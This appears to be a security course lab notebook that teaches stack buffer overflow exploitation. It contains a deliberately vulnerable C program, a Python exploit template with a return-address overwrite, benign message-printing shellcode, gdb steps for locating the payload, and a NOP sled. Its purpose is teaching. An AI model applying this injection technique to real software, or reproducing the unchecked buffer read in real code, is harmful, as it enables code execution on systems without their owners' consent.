# Exploiting Software

Last week, we saw how to hijack control flow and redirect it to our chosen destination. This week, we will see how to take control of a system.

Let's begin with a vulnerable C program. The following code is in "exploitme.c"

In [ ]:
int foo(){
    char buff[256];
    printf("Please type a friendly message: \n");
    fgets(buff,512,stdin);
    return 0;
}

int main(){
        foo();
        return 0;
}

## Shellcode

Compile "exploitme.c" with the "make" command. As you've already learned, we can crash this program by simply filling buff with enough 'A's. You also know that we could rewrite the return address on the stack by overflowing the buffer. This is how we hijack control flow. We have the ability to direct execution anywhere we like. We don't have any code we'd like to execute yet. All dressed up with nowhere to go. How do we get our code into the program?

We're already taking advantage of the user-controlled input to perform the buffer overflow. Why not use it to input our payload as well? The string we input goes into the buffer, and the buffer is on the stack, and the stack is in memory. Therefore, our input string is already somewhere in memory. If our input string contains our payload, we can redirect control flow there and execute our payload.

Just input our payload. This is a simple enough idea in principle, but in practice it's quite complicated. Think about what this really means. We need to input a *string* that contains a binary x86 program! This is difficult, but not impossible.

The hackers that pioneered this trick used it to inject code to open a shell. Some innocent program would be merrily executing on the machine. The hacker would inject their input, and a shell would pop open. This would give the hacker full access to the CLI. This is what "popping a shell" means.

This kind of payload is so common that we just started calling **any** string containing machine code payload "shellcode." We refer to it as "shellcode" now regardless of what the payload actually does. **shellcode** is the raw bytes of machine code put into a string.

Here is some example shellcode:

In [ ]:
shellcode=b"\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x1f\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x69\x6d\x20\x69\x6e\x20\x75\x72\x20\x62\x61\x73\x65\x20\x6b\x69\x6c\x6c\x69\x6e\x20\x75\x72\x20\x64\x30\x30\x64\x7a"

To write shellcode, a hacker has to carefully write their payload in a limited set of assembly code. If you'd like to learn more about it, I posted some links below. Don't worry. I won't make you write shellcode. What does this exploit do? Let's try to run it and find out!

We need to put this shellcode into the buffer, hijack control flow, and then direct execution at our buffer.

## Hijacking Control Flow

We need to hijack control flow again. This means we have two tasks:

1) We need to overflow the buffer with enough 'A's to push our new return address value into the right spot to overwrite the old return address.

2) We need to find where our shellcode is in memory.

Let's start with the first task. We'll build our overflow using "exploitme.py".

In [ ]:
#!/usr/bin/python

from struct import pack

overflow=b"A"*10             # FIX ME (task 1)
new_ra=pack("<I",0xaabbccdd) # FIX ME (task 2)

shellcode=b"\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x1f\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x69\x6d\x20\x69\x6e\x20\x75\x72\x20\x62\x61\x73\x65\x20\x6b\x69\x6c\x6c\x69\x6e\x20\x75\x72\x20\x64\x30\x30\x64\x7a"


payload=overflow+new_ra+shellcode

print(payload)

### Overwriting the Return Address

Run the Python script to generate our input.

exploitme.py > input.txt

Now, let's run gdb on our victim program.

gdb exploitme

Disassemble foo and set a breakpoint for its return instruction. Remember, this instruction represents the moment we want to seize control of execution.

disas foo

In [ ]:
Dump of assembler code for function foo:
   0x080488a5 <+0>:     push   ebp
   0x080488a6 <+1>:     mov    ebp,esp
   0x080488a8 <+3>:     sub    esp,0x108
   0x080488ae <+9>:     sub    esp,0xc
   0x080488b1 <+12>:    push   0x80ac0a8
   0x080488b6 <+17>:    call   0x8050420 <puts>
   0x080488bb <+22>:    add    esp,0x10
   0x080488be <+25>:    mov    eax,ds:0x80d949c
   0x080488c3 <+30>:    sub    esp,0x4
   0x080488c6 <+33>:    push   eax
   0x080488c7 <+34>:    push   0x200
   0x080488cc <+39>:    lea    eax,[ebp-0x108]
   0x080488d2 <+45>:    push   eax
   0x080488d3 <+46>:    call   0x804ff70 <fgets>
   0x080488d8 <+51>:    add    esp,0x10
   0x080488db <+54>:    mov    eax,0x0
   0x080488e0 <+59>:    leave
   0x080488e1 <+60>:    ret

Set a breakpoint here.

break \*0x080488e1

Now, let's run with our input.

run < input.txt

Our goal is to make the stack pointer (esp) point to the new return address. In our Python script, I made that an easily recognizable value ("aabbccdd"). We need to fill the buffer with **exactly** the right number of 'A's so that this gdb command displays "aabbccdd":

x/wx $esp 

**This is your job.** Modify this line of the Python script so we print the right number of letter 'A's. This is *not* a number you should just know or compute. You'll need to iterate and guess and check until you get it right.

In [ ]:
overflow=b"A"*10             # FIX ME (task 1)

You can inspect the memory around the stack pointer with this gdb command:

x/16wx $esp-25

This will print 16 words 25 bytes before esp. The output looks like this:

In [ ]:
0xffffd363:     0x41414141      0x41414141      0x41414141      0xaabbccdd
0xffffd373:     0xc03119eb      0xdb3104b0      0x315901b3      0xcd1fb2d2
0xffffd383:     0xb0c03180      0xb3db3101      0xe880cd01      0xffffffe2

This is output I got when I modified the Python script to print 255 'A's and ran that command. Note that we can see the 'A's overflowing the buffer (hex 0x41414141 is 'AAAAA' in ASCII). Right after all the 'A's, we have 0xddccbbaa. That's the value we want to be at esp, so I need to overflow a bit more.

(Side note: you can see our shellcode immediately after 0xddccbbaa. Our payload is in memory!)

Keep editing the Python script and running the program in the debugger until you get x/x $esp to display 0xddccbbaa breakpoint.

**IMPORTANT REMINDER:** every time you update "exploitme.py", you also need to re-run the script with this command:

exploitme.py > input.txt

### Redirecting Execution

Assuming you've completed task 1, we still need to complete task 2. Now, we're overwriting the return address with 0xaabbccdd. If you run the program in gdb with no breakpoints and give it our input, you should get this error message:

Program received signal SIGSEGV, Segmentation fault.  
0xaabbccdd in ?? ()

We're jumping to memory address 0xaabbccdd, and there aren't any instructions there. 0xaabbccdd was a convenient value for getting the right number of bytes in our overflow, but we need to replace it with the location of our shellcode.

Where is our shellcode? If you look at the Python code, you'll see that we put it into the buffer right *after* the new return address ("new_ra"). In the previous section, you positioned new_ra so it's on top of the stack at the very end of foo. Our shell code is immediately after that. Which means our shell code is juuuuuuust after the top of the stack. That's a helpful clue for finding it. 

**This is your job.** You need to find the address of our shell code and put that in place of 0xaabbccdd in this line of our Python script:

In [ ]:
new_ra=pack("<I",0xaabbccdd) # FIX ME (task 2)

Again, you'll need to run the debugger and set a breakpoint for the end of foo.

gdb exploitme  
break \*0x080488e1  
run < input.txt  

You can view the current top of the stack with x/wx $esp, which should print:

0xffffd37c:     0xaabbccdd

You can also view the contents of a memory address directly with this command:

x/wx 0xffffd37c

You need to find the address of our shellcode. The contents of that memory address should be 0xc03119eb (the reverse of the start of shellcode=b"\xeb\x19\x31\xc0...").

When you find the address, put it into the Python script in place of 0xaabbccdd in the Python script. You should be able to run this series of commands:

exploitme.py > input.txt  
gdb exploitme 
run < input.txt 

If you get this right, our shell code should execute, and you should see a message.

## Nop Sled

You did it! You made an exploit! Let's test it outside the debugger.

./exploitme < input.txt  

Oh no! Your exploit broke! What happened? Why won't the exploit work outside the debugger? We want to hack real programs, not programs running in a debugger!

Our exploit relies on the address in "new_ra" being exactly right. That must be the exact address of the start of our shellcode. If the location of our shellcode were to move by even *one byte*, the entire exploit would break. We'd jump to the wrong instruction or a nonexistent instruction. Eventually, the program would crash.

The call stack is positioned slightly differently inside the debugger than it is outside the debugger. Our exploit is too fragile to work inside and outside the debugger.

"nop" is an x86 instruction that does nothing. We can add a lot of "nop"s. A long we land somewhere in those noops, our exploit will run properly.

Let's add a nop sled to your exploit. In "exploitmenop.py", you'll see code similar to "exploitme.py". In "exploitmenop.py", update the values for the new_ra address and overflow size you found (tasks 1 and 2.)

In [ ]:
#!/usr/bin/python

from struct import pack

new_ra=pack("<I",0xaabbccdd) # FIX ME
overflow=b"A"*10             # FIX ME

shellcode=b"\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x1f\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x69\x6d\x20\x69\x6e\x20\x75\x72\x20\x62\x61\x73\x65\x20\x6b\x69\x6c\x6c\x69\x6e\x20\x75\x72\x20\x64\x30\x30\x64\x7a"

nopsled="\x90"*128

payload=overflow+new_ra+nopsled+shellcode

print(payload)

If you look at the bottom, you can see I've added 128 nops to the payload. The nops are just before the payload. We want to jump a little more than halfway into that sled. That way, if the stack moves a few bytes in either direction, our exploit will still work. We'll hit the nop sled and slide down to the payload.

Add about 80 to the value of new_ra. That should make you jump roughly halfway into the nop sled. Your exploit should now work inside **and** outside the debugger. If it doesn't, add a little bit more to new_ra until it does. Creating exploits is both an art and a science.

## Exercises 

1) How many 'A's did you need to overflow the buffer? How did you find it?

2) Where was our payload on the stack? What value did you put into new_ra to execute the exploit?

3) What did the exploit print out?

4) Could you get your exploit working without the debugger?

## Further Reading

If you'd like to learn more about how to make shellcode, the answers to [this](https://stackoverflow.com/questions/15593214/linux-shellcode-hello-world) Stack Overflow question are spectacular. [This](https://www.doyler.net/security-not-included/hello-world-shellcode) detailed blog post is also very well written.

There's an entire database of shellcode [here](http://shell-storm.org/shellcode/), if you'd like to see what kind of payloads are possible.

If you'd like more on how to write a buffer overflow exploit in detail [this](https://www.youtube.com/watch?v=HSlhY4Uy8SA) YouTube tutorial is also quite nice.